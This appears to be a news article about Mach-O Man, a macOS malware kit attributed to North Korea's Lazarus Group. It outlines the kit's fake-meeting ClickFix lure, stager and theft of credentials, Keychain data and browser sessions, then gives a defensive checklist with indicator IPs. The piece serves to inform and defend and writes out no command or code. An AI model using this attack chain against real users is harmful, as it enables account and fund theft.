North Korea's Lazarus Group has deployed a new macOS malware kit called Mach-O Man, targeting crypto and fintech executives through fake Zoom meeting invitations on Telegram. The same unit is attributed to stealing $285 million from Drift Protocol on April 1 and $292 million from KelpDAO on April 18 — over $575 million stolen in just 18 days, with Mach-O Man now emerging as the third attack vector.
How Does Mach-O Man Work?
TL;DR: Mach-O Man is a macOS malware kit by Lazarus Group that tricks victims into running a Terminal command during a fake Zoom call, harvesting credentials, Keychain data, and browser sessions before self-deleting.
The campaign was identified on April 21, 2026, by the Quetzal security team at Bitso, in collaboration with the threat analysis platform ANY.RUN. The malware is built on native Mach-O binaries — Apple's own executable format — making it invisible to most traditional security tools.
The attack chain unfolds in four stages:
- Lure: An urgent meeting invite arrives via Telegram, often from a compromised account, for a call on Zoom, Teams, or Google Meet
- ClickFix: The fake page displays a connection error and prompts the victim to paste a command into the macOS Terminal to "fix the issue"
- Stager: The command executes
teamsSDK.bin, which downloads a fake application bundle with an ad-hoc signature designed to bypass Gatekeeper - Exfiltration: The malware harvests credentials, Keychain data, and browser sessions across Chrome, Safari, Firefox, Brave, and Opera — then self-deletes
Mauro Eldritch
Mach-O Man's Connection to the Drift and KelpDAO Hacks
CertiK confirmed a direct link between Mach-O Man and both April mega-exploits. The playbook is identical: social engineering as the entry point, not technical vulnerabilities in smart contracts. On Drift, the multisig governance was manipulated via social engineering. On KelpDAO, the RPC infrastructure was compromised from the inside.
Natalie Newson, senior blockchain security researcher at CertiK, was direct:
"This is not random hacking. This is a state-directed financial operation running at the speed and scale of an institution."
The responsible unit — Famous Chollima, the operational division of Lazarus Group — has now been attributed with 18 attacks in 2026 alone, according to Elliptic. Since 2017, the total amount stolen reaches approximately $6.7 billion. The United Nations has confirmed these funds directly finance Kim Jong Un's weapons program.
Lazarus Group Just Released "Mach-O Man" – A Brand-New Native macOS Malware Kit Targeting Fintech, Crypto, and High-Value Executives
— Vladimir S. | Officer's Notes (@officer_secret) April 21, 2026
You get an "urgent" meeting invite over Telegram for a Zoom, Teams, or Google Meet call. The link leads to a convincing fake website that tells…
How to Protect Yourself: Operational Checklist for macOS Crypto Users
For anyone working in crypto, fintech, or Web3 on a Mac, here are the countermeasures recommended by researchers at Bitso and CertiK:
- Never run Terminal commands prompted by a webpage or a chat link
- Verify every meeting invitation through a separate, independent channel (phone call, corporate email)
- Check your LaunchAgents folder (~/Library/LaunchAgents) for suspicious processes impersonating OneDrive or antivirus software
- Block the indicators of compromise published by the Quetzal Team: IPs 172.86.113.102 and 144.172.114.220
- Use a dedicated hardware wallet, never connected to your daily work machine
- Monitor the SpazioCrypto Hack section for real-time updates
What is Mach-O Man malware?
Mach-O Man is a macOS malware kit developed by North Korea's Lazarus Group that uses fake Zoom meeting invitations to trick victims into running a malicious Terminal command, enabling credential theft and browser session hijacking.
How does Mach-O Man bypass macOS Gatekeeper?
Mach-O Man uses an ad-hoc signed application bundle delivered via a fake download, which bypasses Apple's Gatekeeper security mechanism because the signature appears locally valid.
Who are the targets of the Mach-O Man campaign?
The campaign primarily targets crypto founders, CTOs, DeFi contributors, and high-value traders — particularly those using macOS in professional settings.
Is Lazarus Group behind the Drift and KelpDAO hacks?
Yes. CertiK attributed both the $285 million Drift Protocol hack on April 1, 2026, and the $292 million KelpDAO exploit on April 18, 2026, to Lazarus Group's Famous Chollima unit.
The key point is this: Lazarus Group does not need to break your smart contracts. Lazarus Group only needs you to open your Mac Terminal and paste a command that looks harmless. If you are a founder, a CTO, a trader with significant funds, or a DeFi contributor, you are already a target. And as Newson put it — you probably do not know it yet. Review your meeting hygiene today, not after the next $300 million disappears.
